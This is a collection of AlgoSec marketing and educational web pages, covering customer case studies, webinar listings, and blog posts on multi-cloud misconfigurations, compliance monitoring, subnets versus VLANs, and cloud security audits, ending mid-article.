
  • Prevasio sandbox 'Detonates' containers in a safe virtual environment | AlgoSec

    Enhance container security with Prevasio's sandbox. Isolate and "detonate" containers in a safe virtual environment to uncover hidden threats and prevent breaches.

  • State of Utah | AlgoSec

    Explore AlgoSec's customer success stories to see how organizations worldwide improve security, compliance, and efficiency with our solutions. State of Utah: Network Security Management Breaks the Service Bottleneck. Organization: State of Utah. Industry: Government. Headquarters: Salt Lake City, Utah, United States.
"With AlgoSec, I am able to get requests completed within minutes." State government rapidly accelerates security policy changes while increasing security and compliance. Background: Utah is home to over three million people. It is one of America’s fastest-growing states and has the fastest-growing economy by job growth in the nation. The Department of Technology Services (DTS) is the technology service provider for the executive branch of the State of Utah, providing services to Utah’s citizens. DTS supports the computing infrastructure for the state government, including 22,000 telephones, 20,000 desktop computers, 2,400 servers, and 1,300 online services; it monitors over 4 million visits to Utah.gov per month and defends against more than 500 million IT intrusion attempts daily. Challenge: Over forty firewall pairs and hundreds of other devices help the Department of Technology Services serve and secure the Utah government. “Before AlgoSec, it was very challenging for us to manage firewalls,” stated the department’s Director of Information Technology. Some of the challenges included: Firewall rule requests took up 70% of employees’ daily time. Agencies and staff frequently complained about slow response times, which hurt their productivity while staff worked through a lengthy manual process to fulfill requests. Human errors slowed down the processes, requiring extra layers of quality assurance. Large rule request projects took several months to complete. Employee onboarding took several months; new employees could not independently support firewall change requests for the first few months after joining the team.
Solutions: The State of Utah was searching for a solution that provided automation of firewall management, actionable reports to ease compliance requirements, and ease of deployment. Following an in-depth evaluation, the State of Utah selected AlgoSec’s security policy management solution. “We evaluated several other products but none of them really automated at the level that we wanted,” said the director of IT. “AlgoSec’s automation really stood out.” The State of Utah chose to start with AlgoSec Firewall Analyzer (AFA) and AlgoSec FireFlow (AFF), two of the flagship products in the AlgoSec suite. AlgoSec Firewall Analyzer delivers visibility and analysis of complex network security policies across on-premise, cloud, and hybrid networks. It automates and simplifies security operations, including troubleshooting, auditing, and risk analysis. Using Firewall Analyzer, the State of Utah can optimize the configuration of firewalls and network infrastructure to ensure security and compliance. AlgoSec FireFlow enables security staff to automate the entire security policy change process, from design and submission to proactive risk analysis, implementation, validation, and auditing. Its intelligent, automated workflows save time and improve security by eliminating manual errors and reducing risk. Results: By using the AlgoSec Security Management solution, the State of Utah was able to accelerate security policy management, provide better and faster service to state agencies, speed up employee onboarding, and enhance network segmentation. Some of the benefits gained include: Fast and easy deployment – they were up and running within a few weeks. Faster turnaround on firewall requests from staff supporting agencies and priority initiatives. Reduced time to implement large rule requests for projects such as deployments, migrations, and decommissions – from months to minutes.
Better knowledge sharing – hosting staff and extended staff outside of network operations get more accurate insights into firewall and infrastructure topologies and traffic flows. This sped up troubleshooting and reduced superfluous requests already covered by existing rules. Elimination of human error and rework thanks to policy automation. Accelerated employee onboarding – employees joining the network operations team can now fulfill firewall change requests within two weeks of starting work, down from three months – roughly an 80% reduction. “I’ve been able to jump in and use AlgoSec. It’s been really intuitive,” concluded the IT director. “I am very pleased with this product!”

  • Retirement fund | AlgoSec

    Australia’s Leading Superannuation Provider. Organization: Retirement fund. Industry: Financial Services. Headquarters: Australia.
"It’s very easy to let security get left behind. We want to make sure that security is not a roadblock to business performance,” said Bryce. “We need to be agile and we need to make sure we can deploy systems to better support our members. Automation can really help you see that return on investment." Network security policy automation helps a superannuation company reduce costs to provide higher returns to members. Background: The company is one of Australia’s leading superannuation (pension) providers. Its job is to protect clients’ money and information and to offer long-term financial security. Challenges: The company’s firewalls were managed by a Managed Security Service Provider (MSSP), and there had not been enough insight into and analysis of the network over the years, leading to a bloated and redundant network infrastructure. Firewalls and infrastructure did not get the care and attention they needed. As a result, some of their challenges included: legacy firewalls that had not been adequately maintained; difficulty identifying and quantifying network risk; lack of oversight and analysis of the changes made by their MSSP; and change requests for functionality that was already covered by existing rules. The Solution: The customer was searching for a solution that provided a strong local presence and repeatable, recordable change management processes. The client selected AlgoSec’s Security Policy Management Solution, which includes AlgoSec Firewall Analyzer and AlgoSec FireFlow. AlgoSec Firewall Analyzer delivers visibility and analysis of complex network security policies across on-premise, cloud, and hybrid networks. It automates and simplifies security operations, including troubleshooting, auditing, and risk analysis. Using Firewall Analyzer, they can optimize the configuration of firewalls and network infrastructure to ensure security and compliance.
AlgoSec FireFlow enables security staff to automate the entire security policy change process, from design and submission to proactive risk analysis, implementation, validation, and auditing. Its intelligent, automated workflows save time and improve security by eliminating manual errors and reducing risk. The Results: “Straight away, we were able to see a return on investment,” said Stefan Bryce, Security Manager at the superannuation provider. By using the AlgoSec Security Management Solution, the customer gained: greater insight and oversight into their firewalls and other network devices; identification of risky rules and other holes in their network security policy; an easier cleanup process due to greater visibility; audits and accountability for network security policy changes, ensuring ongoing compliance and that newly submitted rules did not introduce additional risk; identification and elimination of duplicate rules; faster implementation of policy changes; greater business agility and innovation, because a seamless policy change process leaves employees better motivated to make changes; consolidation of their internal virtual firewall infrastructure; and reduced ongoing MSSP costs.

  • Master the Zero Trust strategy for improved cybersecurity | AlgoSec

    Learn best practices to secure your cloud environment and deliver applications securely. Webinars: Master the Zero Trust strategy for improved cybersecurity. Learn how to implement zero trust security in your business. In today’s digital world, cyber threats are becoming more complex and sophisticated. Businesses must adopt a proactive approach to cybersecurity to protect their sensitive data and systems. This is where zero trust security comes in – a security model that requires every user, device, and application to be verified before being granted access. If you’re looking to implement zero trust security in your business, or want to know more about how it works, watch this webinar. AlgoSec co-founder and CTO Avishai Wool discusses the benefits of zero trust security and provides practical tips on how to implement this security model in your organization. March 15, 2023. Prof. Avishai Wool, CTO & Co-Founder, AlgoSec. Relevant resources: Protecting Your Network’s Precious Jewels with Micro-Segmentation (Kyle Wickert, AlgoSec); Professor Wool – Introduction to Microsegmentation; Five Practical Steps to Implementing a Zero-Trust Network.

  • AlgoSec | 5 Multi-Cloud Environments

    Top 5 misconfigurations to avoid for robust security. Cloud Security. Iris Stein, 2 min read. Published 6/23/25.
Multi-cloud environments have become the backbone of modern enterprise IT, offering unparalleled flexibility, scalability, and access to a diverse array of innovative services. This distributed architecture empowers organizations to avoid vendor lock-in, optimize costs, and leverage specialized functionality from different providers. However, this very strength introduces a significant challenge: increased complexity in security management. The diverse security models, APIs, and configuration nuances of each cloud provider, when combined, create fertile ground for misconfigurations. A single oversight can cascade into severe security vulnerabilities, lead to compliance violations, and even result in costly downtime and reputational damage. At AlgoSec, we have extensive experience navigating the intricacies of multi-cloud security. Our observations reveal recurring patterns of misconfigurations that undermine even the most well-intentioned security strategies. To help you fortify your multi-cloud defences, we've compiled the top five multi-cloud misconfigurations that organizations absolutely must avoid. 1.
Over-permissive policies: The gateway to unauthorized access One of the most pervasive and dangerous misconfigurations is the granting of overly broad or permissive access policies. In the rush to deploy applications or enable collaboration, it's common for organizations to assign excessive permissions to users, services, or applications. This "everyone can do everything" approach creates a vast attack surface, making it alarmingly easy for unauthorized individuals or compromised credentials to gain access to sensitive resources across your various cloud environments. The principle of least privilege (PoLP) is paramount here. Every user, application, and service should only be granted the minimum necessary permissions to perform its intended function. This includes granular control over network access, data manipulation, and resource management. Regularly review and audit your Identity and Access Management (IAM) policies across all your cloud providers. Tools that offer centralized visibility into entitlements and highlight deviations can be invaluable in identifying and rectifying these critical vulnerabilities before they are exploited. 2. Inadequate network segmentation: Lateral movement made easy In a multi-cloud environment, a flat network architecture is an open invitation for attackers. Without proper network segmentation, a breach in one part of your cloud infrastructure can easily lead to lateral movement across your entire environment. Mixing production, development, and sensitive data workloads within the same network segment significantly increases the risk of an attacker pivoting from a less secure development environment to a critical production database. Effective network segmentation involves logically isolating different environments, applications, and data sets. This can be achieved through Virtual Private Clouds (VPCs), subnets, security groups, network access control lists (NACLs), and micro-segmentation techniques. 
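To make the segmentation idea concrete, here is a minimal, illustrative sketch (the CIDRs and the rule format are hypothetical, not any cloud provider's API) that flags ingress rules allowing a development segment to reach a production segment:

```python
from ipaddress import ip_network

PROD = ip_network("10.0.0.0/24")  # hypothetical production segment
DEV = ip_network("10.0.1.0/24")   # hypothetical development segment

# Ingress rules as (source CIDR, destination CIDR, port) tuples
rules = [
    ("10.0.1.0/24", "10.0.0.0/24", 5432),  # dev -> prod database: risky
    ("10.0.0.0/24", "10.0.0.0/24", 443),   # intra-prod HTTPS: fine
]

def dev_to_prod(rules):
    """Return rules that let the dev segment reach the prod segment."""
    return [r for r in rules
            if ip_network(r[0]).subnet_of(DEV)
            and ip_network(r[1]).subnet_of(PROD)]

print(dev_to_prod(rules))  # only the dev -> prod database rule is flagged
```

Real environments would feed this kind of check from security-group or NACL exports, but the principle is the same: encode the intended segment boundaries once, then test every rule against them.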
The goal is to create granular perimeters around critical assets, limiting the blast radius of any potential breach. By restricting traffic flows between different segments and enforcing strict ingress and egress rules, you can significantly hinder an attacker's ability to move freely within your cloud estate. 3. Unsecured storage buckets: A goldmine for data breaches Cloud storage services, such as Amazon S3, Azure Blob Storage, and Google Cloud Storage, offer incredible scalability and accessibility. However, their misconfiguration remains a leading cause of data breaches. Publicly accessible storage buckets, often configured inadvertently, expose vast amounts of sensitive data to the internet. This includes customer information, proprietary code, intellectual property, and even internal credentials. It is imperative to always double-check and regularly audit the access controls and encryption settings of all your storage buckets across every cloud provider. Implement strong bucket policies, restrict public access by default, and enforce encryption at rest and in transit. Consider using multifactor authentication for access to storage, and leverage tools that continuously monitor for publicly exposed buckets and alert you to any misconfigurations. Regular data classification and tagging can also help in identifying and prioritizing the protection of highly sensitive data stored in the cloud. 4. Lack of centralized visibility: Flying blind in a complex landscape Managing security in a multi-cloud environment without a unified, centralized view of your security posture is akin to flying blind. The disparate dashboards, logs, and security tools provided by individual cloud providers make it incredibly challenging to gain a holistic understanding of your security landscape. 
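The storage-bucket audit described above can be sketched as a simple check over an exported inventory (the record format and field names here are our own, for illustration, not any provider's API):

```python
# Hypothetical bucket inventory, e.g. exported from a cloud asset report
buckets = [
    {"name": "public-assets", "public": True,  "encrypted": True},
    {"name": "customer-data", "public": True,  "encrypted": False},  # misconfigured
    {"name": "internal-logs", "public": False, "encrypted": True},
]

def risky_buckets(buckets):
    """Flag buckets that are publicly accessible or unencrypted at rest."""
    return [b["name"] for b in buckets if b["public"] or not b["encrypted"]]

print(risky_buckets(buckets))  # ['public-assets', 'customer-data']
```

A continuous-monitoring tool runs essentially this loop on every scan, alerting when a bucket drifts from the restrict-public-by-default, encrypt-everything posture.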
This fragmented visibility makes it nearly impossible to identify widespread misconfigurations, enforce consistent security policies across different clouds, and respond effectively and swiftly to emerging threats. A centralized security management platform is crucial for multi-cloud environments. Such a platform should provide comprehensive discovery of all your cloud assets, enable continuous risk assessment, and offer unified policy management across your entire multi-cloud estate. This centralized view allows security teams to identify inconsistencies, track changes, and ensure that security policies are applied uniformly, regardless of the underlying cloud provider. Without this overarching perspective, organizations are perpetually playing catch-up, reacting to incidents rather than proactively preventing them. 5. Neglecting Shadow IT: The unseen security gaps Shadow IT refers to unsanctioned cloud deployments, applications, or services that are used within an organization without the knowledge or approval of the IT or security departments. While seemingly innocuous, shadow IT can introduce significant and often unmanaged security gaps. These unauthorized resources often lack proper security configurations, patching, and monitoring, making them easy targets for attackers. To mitigate the risks of shadow IT, organizations need robust discovery mechanisms that can identify all cloud resources, whether sanctioned or not. Once discovered, these resources must be brought under proper security governance, including regular monitoring, configuration management, and adherence to organizational security policies. Implementing cloud access security brokers (CASBs) and network traffic analysis tools can help in identifying and gaining control over shadow IT instances. Educating employees about the risks of unauthorized cloud usage is also a vital step in fostering a more secure multi-cloud environment. 
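At its core, shadow-IT detection reduces to comparing what discovery finds against what has been sanctioned; a toy sketch (resource names hypothetical):

```python
# Resources found by automated discovery vs. the approved inventory
discovered = {"vm-web-01", "vm-db-01", "fn-report", "bucket-scratch"}
sanctioned = {"vm-web-01", "vm-db-01", "fn-report"}

shadow = discovered - sanctioned   # running without approval: review or decommission
missing = sanctioned - discovered  # approved but absent: stale inventory entries

print(sorted(shadow), sorted(missing))  # ['bucket-scratch'] []
```

The hard part in practice is the discovery side (CASBs, traffic analysis, provider asset APIs); once both sets exist, the governance gap is just this set difference.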
Proactive management with AlgoSec Cloud Enterprise: Navigating the complex and ever-evolving multi-cloud landscape demands more than awareness of these pitfalls; it requires deep visibility and proactive management. This is precisely where AlgoSec Cloud Enterprise excels. Our solution provides comprehensive discovery of all your cloud assets across providers, offering a unified view of your entire multi-cloud estate. It enables continuous risk assessment by identifying misconfigurations, policy violations, and potential vulnerabilities. Furthermore, AlgoSec Cloud Enterprise enables automated policy enforcement, ensuring consistent security postures and helping you eliminate misconfigurations before they can be exploited. By providing this robust framework for security management, AlgoSec helps organizations maintain a strong and resilient security posture on their multi-cloud journey. Stay secure out there! The multi-cloud journey offers immense opportunities, but only with diligent attention to security and proactive management can you truly unlock its full potential while safeguarding your critical assets.

  • AlgoSec | Continuous compliance monitoring best practices 

    Auditing and Compliance: Continuous compliance monitoring best practices. Tsippi Dach, 2 min read. Published 3/19/23.
As organizations respond to an ever-evolving set of security threats, network teams are scrambling to find new ways to keep up with numerous standards and regulations and avoid their next compliance audit violation. Can this nightmare be avoided? Yes, and it’s not as complex as one might think if you take a “compliance first” approach. It may not come as a surprise, but the number of cyber attacks is increasing every year, and with it the risk to companies’ financial, organizational, and reputational standing. What’s at stake? The stakes are high when it comes to cyber security compliance. A single data breach can result in massive financial losses, damage to a company’s reputation, and even jail time for executives. Data breaches: Data breaches are expensive and becoming more so by the day. According to the Ponemon Institute’s 2022 Cost of a Data Breach Report, the average cost of a data breach is $4.35 million. Fraud: Identity fraud is one of the most pressing cybersecurity threats today. In large organizations the scale of fraud is usually also large, producing heavy losses that erode profitability. In a recent PwC survey, nearly one in five organizations said that their most disruptive incident cost over $50 million. Theft: Identity theft is on the rise and can be the first step toward compromising a business. A study from Javelin Strategy & Research found that identity fraud cost US businesses an estimated $56 billion in 2021. What’s the potential impact?
The potential impact of non-compliance can be devastating to an organization. Financial penalties, loss of customers, and damage to reputation are just a few of the possible consequences. To avoid these risks, organizations must make compliance a priority and take steps to ensure that they are meeting all relevant requirements. Legal impact: regulatory or legal action brought against the organization or its employees that could result in fines, penalties, imprisonment, product seizures, or debarment. Financial impact: negative effects on the organization’s bottom line, share price, potential future earnings, or investor confidence. Business impact: adverse events, such as embargos or plant shutdowns, that could significantly disrupt the organization’s ability to operate. Reputational impact: damage to the organization’s reputation or brand – for example, bad press or social-media discussion, loss of customer trust, or decreased employee morale. How can this be avoided? To stay ahead of ever-expanding regulatory requirements, organizations must adopt a “compliance first” approach to cyber security. This means enforcing strict compliance criteria and taking immediate action to address any violations, to ensure data is protected. Some of these measures include: Risk assessment: conduct ongoing monitoring of your compliance posture and regular internal audits. Documentation: enforce continuous tracking of changes and their intent. Annual audits: commission third-party annual audits to ensure adherence to regulatory and legislative requirements (HIPAA, GDPR, PCI DSS, SOX, etc.). Conclusion and next steps: Compliance violations are no laughing matter. They can result in fines, business loss, and even jail time in extreme cases. And they can be difficult to avoid unless you take the right steps.
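The "continuous tracking of changes" measure above can be pictured as a drift check: snapshot the approved policy, then diff the live configuration against it on every scan. A minimal sketch (the rule format is hypothetical):

```python
# Approved baseline vs. currently deployed rules, as (src, dst, port) tuples
baseline = {
    ("10.0.0.0/24", "10.0.1.0/24", 443),
}
current = {
    ("10.0.0.0/24", "10.0.1.0/24", 443),
    ("0.0.0.0/0", "10.0.1.0/24", 22),  # unapproved change: SSH open to the world
}

added = current - baseline    # rules that appeared without approval
removed = baseline - current  # approved rules that vanished

print(sorted(added), sorted(removed))
```

Running this continuously, rather than once a year before the audit, is what turns "compliance first" from a slogan into a daily control.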
You have a complex set of rules and regulations to follow, as well as numerous procedures, processes, and policies. And if you don’t stay on top of things, you can end up with a compliance violation mess that is difficult to untangle. Fortunately, there are ways to reduce the risk of being blindsided by a compliance violation within your organization. Now that you know the risks and what needs to be done, the best practices outlined above will help you stay ahead of your next audit.

  • AlgoSec | Network segmentation vs. VLAN explained

    Network Security Policy Management: Network segmentation vs. VLAN explained. Tsippi Dach, 2 min read. Published 8/9/23.
Safeguarding the network architecture is the need of the hour. According to one study, the average cost of a data breach is at an all-time high of $4.35 million. And this figure will only increase as governments and regulators become ever stricter about data breaches. The go-to method IT administrators adopt to safeguard their networks is network segmentation. By segmenting a larger network into smaller chunks, it becomes much more manageable to secure the entire network. But network segmentation is a broad concept, not a single procedure; there are several segmentation approaches, one of them being VLANs. Instead of simplifying, this can add to the confusion. In this article, we explain the core difference between network segmentation and VLANs and when you should opt for one over the other. What is network segmentation? Let’s start with definitions. Network segmentation is the practice of compartmentalizing a network, typically enforced through firewall rules. In other words, it’s about dividing a computer network into subnetworks. The subnetworks, at the IP level, are known as subnets. Each subnet then works independently and in isolation. Think of how a nation is split into states and provinces for better management at the local level: running an entire nation at the federal level is too much work.
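The division into subnets can be demonstrated with Python's standard-library ipaddress module; here an illustrative /16 address block is carved into /24 subnets:

```python
from ipaddress import ip_network

corporate = ip_network("10.20.0.0/16")  # example address block

# Carve the block into /24 subnets, each an independently routable segment
subnets = list(corporate.subnets(new_prefix=24))

print(len(subnets))              # 256 subnets
print(subnets[0])                # 10.20.0.0/24
print(subnets[0].num_addresses)  # 256 addresses (254 usable hosts)
```

Each resulting /24 can then be assigned to a department or workload tier, with routing and firewall rules controlling traffic between them.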
In addition to subnetting, there are other segmentation options, such as firewall segmentation and SDN (software-defined networking) segmentation. But for this article’s sake, we will focus on subnets, since those are the most common. What is a VLAN? A VLAN, or Virtual LAN (Virtual Local Area Network), is a network segmentation approach in which the main physical network is divided into multiple smaller virtual networks. The division is done logically rather than physically, so it does not require buying additional hardware; the same physical resources are divided using software logic. There are several benefits to dividing a network, whether using VLANs or subnets. Some of them are: Broadcast domain isolation: Both subnets and VLANs isolate broadcast domains. This way, broadcast traffic is contained within a single segment instead of being flooded to the entire network, reducing the chance of network congestion during peak hours and unnecessary server overload, and thereby maximizing efficiency. Enhanced security: The isolation provided by subnets or VLANs strengthens the network’s security posture. Primarily, the creation of subnetworks makes a flat network more secure: with multiple subnetworks, you can tune security parameters per segment, so subnets containing critical data (such as healthcare records) can carry stronger cybersecurity measures than others, making them harder to crack. From a security perspective, both subnets and VLANs are a must. Better network management: With digitization and IT modernization, IT infrastructure keeps growing, and it is getting harder to manage. Micro-segmentation is one way of managing this ever-growing infrastructure: by segmenting, you can assign teams to each segment, strengthening management and accountability.
With the implementation of SDN, you can even configure and automate the management of some of the subnetworks. Flexibility in scalability: Many network administrators face performance and scalability issues when expanding resources; the issues are a mix of technical and economic. Network segmentation offers a solution: by segmenting the entire data center network, you can choose which segments to expand and control the resources granted to each segment. This also makes scaling more economical. While both offer scalability opportunities, VLANs offer more flexibility here than subnets. Reduced scope of compliance: Compliance is another area IT executives need to work on, and network segmentation, via either subnets or VLANs, can help. With subnets, you don’t have to audit your entire network as required by regulators; just audit the relevant subnets and submit the reports for approval. This takes far less time and costs significantly less than auditing the entire network. Differences between network segmentation and VLANs: By definition, network segmentation (subnetting) and VLANs sound pretty similar; in both, a main network is divided into smaller networks. But besides the core similarities mentioned above, there are a few critical differences. The primary difference is that subnets are layer 3 divisions, while VLANs are layer 2 divisions. Recall the OSI model: layer 1 (physical), layer 2 (data link), layer 3 (network: IP and routing), and so on up to layer 7 (application); the TCP/IP model condenses these into four layers. So, when you divide a network at the data link layer, you use VLANs. With VLANs, several logical networks exist on the same physical network, and their members need not be connected to the same switch. With subnets, the division occurs at the IP level.
Thus, independent subnets are assigned their own IP addresses and communicate with each other over layer 3. Besides this significant difference, there are other dissimilarities you should know:
1. A VLAN divides the network within the same physical network using logic; a subnet divides an IP network into multiple smaller IP networks.
2. Devices in a VLAN communicate with each other within the same LAN; communication between subnets is carried out over layer 3.
3. A VLAN is configured on the switch side; a subnet is configured at the IP level.
4. VLAN divisions are software-based, since they are made logically; subnets can be both hardware- and software-based.
5. VLANs provide finer control over network access and tend to be more stable; subnets offer more limited control.
When to adopt a subnet? There are use cases where subnets are better suited, and cases where you’re better off with virtual LANs. As per the definition, you adopt subnets when dividing networks at the IP level. If you want each partition to have its own range of IP addresses, implement subnets. Subnets are essentially networks within a network, with their own IP addresses; they divide the broadcast domain and improve speed and efficiency. Subnets are also the go-to segmentation method when you need to make the sub-networks reachable over layer 3 from the outside world: with appropriate access control lists, anyone with an internet connection can access the subnets. Subnetting is also used to prevent access to a particular subnet. For example, you may want to limit access to the company’s software codebase to anyone outside the development department, so only devices with IP addresses from the developer network are approved to access the codebase. But there are two downsides to subnets you should know. The first is increased time complexity.
When dealing with a single network, reaching a process takes three steps (Source Host, Destination Network, Process). With subnets, there’s an additional step (Source Host, Destination Network, Subnet, Process). This extra step increases time complexity, requiring more time for data transfer and connectivity, and it also affects stability. Subnetting also increases the number of IP address ranges to administer, since each subnet requires its own. This can become hard to manage over time. When to adopt VLAN? Virtual LANs are logical networks within the same physical network. Their members interact with one another, but not with other devices on the same physical network or with the outside world. Think of a VLAN as a private wireless network at home: your neighbors don’t have access to it, but everyone in your home does. If that sounds like your desired result, you should adopt a VLAN. There are three types of VLANs (basic, extended, and tagged). In a basic VLAN, you assign IDs to each switch port; once assigned, you can’t change them. An extended VLAN has more functionality, such as priority-based routing. Lastly, a tagged VLAN enables you to create multiple VLANs over the same link using IEEE 802.1Q tags. The main advantages of VLANs over subnets are speed and stability. Since endpoints do not have to resolve IP addresses every time, they tend to be faster. But there’s a significant disadvantage to VLANs: it’s easier to breach multiple partitions if there’s a malicious injection. Without proper network security controls, it is easier to exploit vulnerabilities using malware and ransomware, putting your entire network at risk. Having ACLs (access control lists) can help in such situations. Furthermore, there are issues arising from physical hardware requirements. Connecting two VLAN segments requires routers, which are physical devices that take up space. The more segments you create, the more routers you need. Over time, management can become an issue.
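The subnetting arithmetic described above is easy to see in practice. The sketch below uses Python's standard ipaddress module; the address ranges and department names are made up for illustration.

```python
import ipaddress

# Illustrative only: carve one /24 network into four /26 subnets,
# one per department. Each subnet is its own layer 3 broadcast domain.
office = ipaddress.ip_network("10.0.0.0/24")
subnets = list(office.subnets(prefixlen_diff=2))  # /24 -> four /26 blocks

for dept, net in zip(["engineering", "sales", "hr", "guest"], subnets):
    print(dept, net, "usable hosts:", net.num_addresses - 2)

# Layer 3 separation: an address belongs to exactly one subnet.
host = ipaddress.ip_address("10.0.0.5")
print(host in subnets[0])  # True: 10.0.0.5 is inside 10.0.0.0/26
print(host in subnets[3])  # False: not in 10.0.0.192/26 (the guest subnet)
```

Note the overhead each subnet introduces: every /26 reserves its own network and broadcast address, which is the extra address management mentioned above.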
The bottom line Both subnets and VLANs are network segmentation approaches that improve security and workload management. It’s not a given that you can’t have both: some companies benefit from implementing VLANs and subnets simultaneously. But there are specific cases where IT service providers prefer one over the other. Consider your requirements to select the approach that’s right for you.

  • Firewalls Ablaze? Put Out Network Security Audit & Compliance Fires | AlgoSec

    Webinars Firewalls Ablaze? Put Out Network Security Audit & Compliance Fires The growing body of regulations and standards forces enterprises to put considerable emphasis on compliance, verified by ad hoc and regular auditing of security policies and controls. While regulatory and internal audits entail a wide range of security checks, network firewalls feature prominently as the first line of defense of the enterprise network. Typical networks might include tens or hundreds of firewalls from multiple vendors running thousands of rules, so auditing firewalls for compliance is becoming more complex and demanding all the time. Documentation of current rules and their change history is often lacking. The time and resources required to find, organize, and inspect all the firewall rules to determine the level of compliance are exorbitant and growing. It’s time to adopt audit best practices to maintain continuous compliance. Join us in this webinar to discover the Firewall Audit Checklist: six best practices that will ensure successful audits and full compliance. By adopting these best practices, security teams will significantly improve their network’s security posture and reduce the pain of ensuring compliance with regulations, industry standards, and corporate policies. Tal Dayan AlgoSec security expert Relevant resources Firewall audit checklist for security policy rules review See Documentation AlgoSec AppViz - Application visibility for AlgoSec Firewall Analyzer See Documentation Firewall policy management Automate firewall rule changes See Documentation

  • How to Manage Your Cloud Journey | AlgoSec

    Cloud management enhances visibility across a hybrid network, processes network security policy changes in minutes, and reduces configuration risks. But what does effective cloud management look like? Webinars How to Manage Your Cloud Journey Episode 1 of Keeping Up-to-Date with Your Network Security Securing your data was once much simpler, but it has grown more complex in recent years. As the workforce becomes more distributed, so does your data. Spreading your data across multiple public and private clouds complicates your network. While data used to sit behind lock and key in guarded locations, today’s data sits in multiple locations and geographies, spread across public clouds, private clouds, and other on-premises network devices. This is why managing your cloud journey can be tiresome and complicated. Enter cloud management. Cloud management enhances visibility across a hybrid network, processes network security policy changes in minutes, and reduces configuration risks. But how can you leverage your cloud management to reap these benefits? What does effective cloud management look like, and how can you achieve it when workloads, sensitive data, and information are so widely dispersed? In this episode we’ll discuss: How to manage multiple workloads on the cloud What successful security management looks like for today’s enterprises How to achieve simple, effective security management for your hybrid network May 4, 2021 Alex Hilton Chief Executive at Cloud Industry Forum (CIF) Stephen Owen Esure Group Oren Amiram Director Product Management, AlgoSec Relevant resources A Pragmatic Approach to Network Security Across Your Hybrid Cloud Environment Keep Reading State of cloud security: Concerns, challenges, and incidents Read Document

  • AlgoSec | What is a Cloud Security Audit? (and How to Conduct One)

    A cloud security audit is a review of an organization’s cloud security environment. During an audit, the security... Cloud Security What is a Cloud Security Audit? (and How to Conduct One) Rony Moshkovich 2 min read 6/23/23 Published Cloud environments are used to store over 60 percent of all corporate data as of 2022. With so much data in the cloud, organizations rely on cloud security audits to ensure that cloud services can safely provide on-demand access.
In this article, we explain what a cloud security audit is, its main objectives, and its benefits. We’ve also listed the six crucial steps of a cloud audit and a checklist of example actions taken during an audit. What Is a Cloud Security Audit? A cloud security audit is a review of an organization’s cloud security environment . During an audit, the security auditor will gather information, perform tests, and confirm whether the security posture meets industry standards. Cloud service providers (CSPs) offer three main types of services: Software as a Service (SaaS) Infrastructure as a Service (IaaS) Platform as a Service (PaaS) Businesses use these solutions to store data and drive daily operations. A cloud security audit evaluates a CSP’s security and data protection measures. It can help identify and address any risks. The audit assesses how secure, dependable, and reliable a cloud environment is. Cloud audits are an essential data protection measure for companies that store and process data in the cloud. An audit assesses the security controls used by CSPs within the company’s cloud environment. It evaluates the effectiveness of the CSP’s security policies and technical safeguards. Auditors identify vulnerabilities, gaps, or noncompliance with regulations. Addressing these issues can prevent data breaches and exploitation via cybersecurity attacks. Meeting mandatory compliance standards will also prevent potentially expensive fines and being blacklisted. Once the technical investigation is complete, the auditor generates a report. This report states their findings and can have recommendations to optimize security. An audit can also help save money by finding unused or redundant resources in the cloud system. Main Objectives of a Cloud Security Audit The main objective of a cloud security audit is to evaluate the health of your cloud environment, including any data and applications hosted on the cloud. 
Other important objectives include: Decide the information architecture: Audits help define the network, security, and systems requirements to secure information. This includes data at rest and in transit. Align IT resources: A cloud audit can align the use of IT resources with business strategies. Identify risks: Businesses can identify risks that could harm their cloud environment. This could be security vulnerabilities, data access errors, and noncompliance with regulations. Optimize IT processes: An audit can help create documented, standardized, and repeatable processes, leading to a secure and reliable IT environment. This includes processes for system ownership, information security, network access, and risk management. Assess vendor security controls: Auditors can inspect the CSP’s security control frameworks and reliability. What Are the Two Types of Cloud Security Audits? Security audits come in two forms: internal and external. In internal audits, a business uses its resources and employees to conduct the investigation. In external audits, a third-party organization is hired to conduct the audit. The internal audit team reviews the organization’s cloud infrastructure and data. They aim to identify any vulnerabilities or compliance issues. A third-party auditor will do the same during an external audit. Both types of audits provide an objective assessment of the security posture . But internal audits are rare since there is a higher chance of prejudice during analysis. Who Provides Cloud Security Audits? Cloud security assessments are provided by: Third-party auditors: Independent third-party audit firms that specialize in auditing cloud ecosystems. These auditors are often certified and experienced in CSP security policies. They also use automated and manual security testing methods for a comprehensive evaluation. Some auditing firms extend remediation support after the audit. 
Cloud service providers: Some cloud platforms offer auditing services and tools. These tools vary in the depth of their assessments and the features they provide to fix problems. Internal audit teams: Many organizations use internal audit teams. These teams assess the controls and processes using CSPM tools. They provide recommendations for improving security and mitigating risks. Why Cloud Security Audits Are So Important Here are ten reasons why security audits of cloud services are so important: Identify security risks: An audit can identify potential security risks. This includes weaknesses in the cloud infrastructure, apps, APIs, or data. Recognizing and fixing these risks is critical for data protection. Ensure compliance: Audits help the cloud environment comply with regulations like HIPAA, PCI DSS, and ISO 27001. Compliance with these standards is vital for avoiding legal and financial penalties. Optimize cloud processes: An audit can help create efficient processes using fewer resources. There is also a decreased risk of breakdowns or malfunctions. Manage access control: Employees constantly change positions within the company or leave. With an audit, businesses can ensure that everyone has the right level of access. For example, access is completely removed for former employees. Auditing access control verifies whether employees can safely log in to cloud systems. This is done via two-step authentication, multi-factor authentication, and VPNs. Assess third-party tools: Multi-vendor cloud systems include many third-party tools and API integrations. An audit of these tools and APIs can check whether they are safe. It can also ensure that they do not compromise overall security. Avoid data loss: Audits help companies identify areas of potential data loss. This could be during transfer or backup or throughout different work processes. Patching these areas is vital for data safety. Check backup safety: Cloud vendors offer services to back up company data regularly.
An audit of backup mechanisms can ensure they are performed at the right frequency and without any flaws. Proactive risk management: Organizations can address potential risks before they become major incidents. Taking proactive action can prevent data breaches, system failures, and other incidents that disrupt daily operations. Save money: Audits can help remove obsolete or underused resources in the cloud. Doing this saves money while improving performance. Improve cloud security posture: Like an IT audit, a cloud audit can help improve overall data confidentiality, integrity, and availability. How Is a Cloud Security Audit Conducted? The exact audit process varies depending on the specific goals and scope. Typically, an independent third party performs the audit. It inspects a cloud vendor’s security posture. It assesses how the CSP implements security best practices and whether it adheres to industry standards. It also evaluates performance against specific benchmarks set before the audit. Here is a general overview of the audit process: Define the scope: The first step is to define the scope of the audit. This includes listing the CSPs, security controls, processes, and regulations to be assessed. Plan the audit: The next step is to plan the audit. This involves establishing the audit team, a timeline, and an audit plan. This plan outlines the specific tasks to be performed and the evaluation criteria. Collect information: The auditor can collect information using various techniques. This includes analytics and security tools, physical inspections, questioning, and observation. Review and analyze: The auditor reviews all the information to evaluate the security posture. Create an audit report: An audit report summarizes 